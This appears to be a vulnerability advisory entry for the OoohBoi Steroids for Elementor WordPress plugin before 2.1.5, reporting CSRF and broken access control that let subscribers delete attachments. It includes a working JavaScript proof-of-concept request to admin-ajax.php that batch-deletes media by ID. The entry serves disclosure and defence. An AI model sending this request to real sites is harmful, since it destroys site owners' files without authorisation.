Lucene search

K
wpexploitLana CodesWPEX-ID:AC74DF9A-6FBF-4411-A501-97EBA1AD1895
HistoryFeb 28, 2023 - 12:00 a.m.

OoohBoi Steroids for Elementor < 2.1.5 - Subscriber+ Attachment Deletion

2023-02-2800:00:00
Lana Codes
102
elementor
steroids
exploit
subscriber+ attachment
deletion
ajax
security

EPSS

0.001

Percentile

20.0%

The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber to delete attachment.

Exploit (#1 attachment id delete):

fetch('/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=exopite-sof-file-batch-delete&media-ids%5B%5D=682&media-ids%5B%5D=683',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

EPSS

0.001

Percentile

20.0%

Related for WPEX-ID:AC74DF9A-6FBF-4411-A501-97EBA1AD1895